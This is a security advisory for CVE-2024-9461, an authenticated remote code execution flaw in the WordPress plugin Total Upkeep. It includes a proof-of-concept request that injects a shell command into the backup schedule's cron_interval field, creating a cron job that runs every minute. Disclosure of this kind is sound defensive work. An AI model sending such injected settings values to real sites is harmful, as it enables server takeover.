Vulnerability Title: Total Upkeep <= 1.16.5 - Authenticated (Administrator+) Remote Code Execution via Backup Settings
CVE ID: CVE-2024-9461
CVSS Severity Score: 7.2 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Organization: Wordfence
Vulnerability Researcher(s): Jonas Benjamin Friedli
The vulnerable page is the Backup Schedule in the settings. The following request will create a cron tab which is run every minute and creates/updates the file /tmp/poc. Note that the site_check attribute must be set to false (0) and admin access, as well as a nonce is required:
POST /wordpress/wp-admin/admin.php?page=boldgrid-backup-settings HTTP/1.1
cron_interval=*%20*%20*%20*%20*%20%2fusr%2fbin%2ftouch%20%2ftmp%2fpoc%20%26%26&site_check=0&submit=Save+Changes&settings_auth=26daf103b2&save_time=1723968375
The cron-interval resolves to "* * * * * /usr/bin/touch /tmp/poc &&"```
resolves security notice: